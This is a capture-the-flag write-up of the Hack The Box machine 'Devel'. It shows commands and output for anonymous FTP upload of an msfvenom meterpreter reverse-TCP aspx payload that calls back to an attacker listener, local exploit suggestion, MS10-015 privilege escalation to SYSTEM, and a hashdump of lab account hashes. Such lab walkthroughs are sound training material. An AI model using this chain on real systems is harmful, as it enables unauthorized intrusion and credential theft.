HTB: Devel

Welcome to my write up for 'Devel' which is a retired machine over at Hack the Box. Full disclaimer here: I'm actually following The Cyber Mentor to kick start my motivation and get my head back on track. It's worth noting that even though these are the 'easy' boxes The Cyber Mentor brings up tools, techniques and background info that you may not have thought of and that in turn promotes further self study and development outside of the box.

So without further ado lets start by enumerating the target IP with nmap using the following options:
-sC : runs the most common scripts
-sV : detects versions where possible
-oA <filename> : saves output as all versions

#nmap -sC -sV -oA nmap 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 04:47 EDT
Nmap scan report for 10.10.10.5
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 09-04-19  10:32AM                 1442 cmdasp.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
| 09-04-19  07:02PM                 2836 shell.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We can see in nmap's output that port 80 looks to be running "Microsoft IIS httpd 7.5". Opening a browser and connecting to HTTP://10.10.10.5:80 confirms the presence of a web sever and shows the following IIS 7 landing page

A quick look at the page source shows the image as <img src="welcome.png" which coincidentally has the same name as the png file in the ftp directory which was enumerated by our nmap scan.

We can also see that anonymous access is possible so we should test our ability to create and upload a file, which may then lead to executing malicious code. First I create a local html file using the echo command and upload up it through ftp using the put command.

#echo "Hello Devel" > 8bit.html
#ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:user): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put 8bit.html
local: 8bit.html remote: 8bit.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
di226 Transfer complete.
13 bytes sent in 0.00 secs (151.1347 kB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
09-04-19  08:04PM                   13 8bit.html
03-18-17  02:06AM       <DIR>          aspnet_client
09-04-19  10:32AM                 1442 cmdasp.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

Next I open a browser and try to open the 8bit.html file that was just uploaded. As you can see in the following screenshot the browser has correctly displayed the contents of our uploaded file. Success!

So now we need to do something with this ability? Given that we can upload and run a file, we can look at using msfvenom to create a payload in combination with metasploit. Lets get started...

As this is a Windows IIS server we can look at creating an .asp or .aspx file. But first, as my memory is so terrible I need to find the payload related to windows meterpreter reverse tcp connections. The '-l payload' option will list all modules for payloads and we can grep the results as required.

#msfvenom -l payload | grep 'meterpreter/reverse'
...
windows/meterpreter/reverse_tcp         
    Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
...
       

Using the following options we can build up our payload:

-p windows/meterpreter/reverse_tcp : sets the payload to use
LHOST=10.10.14.7 : sets the ip to connect back to
LPORT=6666 : sets the port to connect back to
-f aspx : sets the output format to aspx
> 8bit.aspx : pipes the output to a file

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=6666 -f aspx > 8bit.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2802 bytes

Next we upload our payload via ftp, just like we did with our test html file.

ftp> put 8bit.aspx 
local: 8bit.html remote: 8bit.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
13 bytes sent in 0.00 secs (181.3616 kB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
09-04-19  08:39PM                 2838 8bit.aspx
03-18-17  02:06AM       <DIR>          aspnet_client
09-04-19  10:32AM                 1442 cmdasp.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png

And last but not least, we need to set up our local exploit handler by starting msfconsole (This is just an interface to the Metasploit Framework) and setting up the 'exploit/multi/handler'.

#msfconsole
...

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Notice when we show options there is currently listed so we need to go ahead and set up a payload to use. We'll set this to be the same as what was specified in our msfvenom payload (windows/meterpreter/reverse_tcp).

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.7:6666 

Again, we set the LHOST and LPORT for the payload and then run it. At this point it'll listen and wait for our aspx payload to connect back.

In a browser we open the aspx file we uploaded via ftp. In my case I open http://10.10.10.5/8bit.aspx and if we monitor msfconsole we should see a meterpreter session open up.

[*] Started reverse TCP handler on 10.10.14.7:6666 
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.7:6666 -> 10.10.10.5:49176) at 2019-09-01 06:08:52 -0400

Excellent. Now check 'sysinfo' and 'getuid' from the meterpreter session.

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web

Oh dear. Looks like we've only managed to get a web account with limited privileges.

So what I learnt tonight is that metasploit has what's called "post-exploitation modules" and one of these is an exploit suggester. Perfect!

First we background our current session and then do a quick search for the exploit suggester to get the right syntax.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

Next we load this module with the standard 'use' command, show the options and set the session for it to run against.

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set session 1

Once it's all set up we can run it and it to scan the host and collect known exploits for it. How cool is that!

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

So in our case metasploit checked a total of 29 exploits against this machine and returned a list of potential options. Feel free to experiment with one or all. I initially tried 'bypassuac_eventvwr' and then 'ms10_092_schelevator' with no success. For my third attempt I stuck to TCM's advice and used 'windows/local/ms10_015_kitrap0d'.

It's the same format as usual - first 'use' the exploit, check options, set the session and then run it.

Arghhhh.... as I've run it I can see it's listening on a completely different IP which wasn't shown when I originally ran 'options'.

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.1.29:4444 
[*] Launching notepad to host the exploit...
[+] Process 3528 launched.
[*] Reflectively injecting the exploit DLL into 3528...
[*] Injecting exploit into 3528 ...
[*] Exploit injected. Injecting payload into 3528...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms10_015_kitrap0d) > 

If we run 'options' one more time and check again we can now see fields to specify the LHOST and LPORT, so that's what I'll do. I set my LHOST and LPORT and try again.

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.

Bugger. This time my exploit completed but no session was created. This happens sometimes so don't fret. Start your exploit/multi/handler once again and open your aspx file in the browser and we'll be back to the future in no time. Do note your session number will have incremented so be sure to update that in your options.

Okay.. we're back. This time when I ran the exploit we have success!

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.7:6667 
[*] Launching notepad to host the exploit...
[+] Process 3780 launched.
[*] Reflectively injecting the exploit DLL into 3780...
[*] Injecting exploit into 3780 ...
[*] Exploit injected. Injecting payload into 3780...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.14.7:6667 -> 10.10.10.5:49158) at 2019-09-01 06:55:07 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a450f6000be7df50ee304d0a838d638f:::
babis:1000:aad3b435b51404eeaad3b435b51404ee:a1133ec0f7779e215acc8a36922acf57:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > 

You can see above that when I run getuid this time I have 'NT AUTHORITY\SYSTEM'

From here we have free reign, but for the sake of Hack The Box we can extract the two flags as needed and mark Devel as complete!

Exploits used:

MS10-015

Websites, Tools and Commands Used:

nmap - usage and examples
metasploit
msfvenom
meterpreter
Metasploit Post-Exploitation Module Reference
ms10_015_kitrap0d

8bit kiwi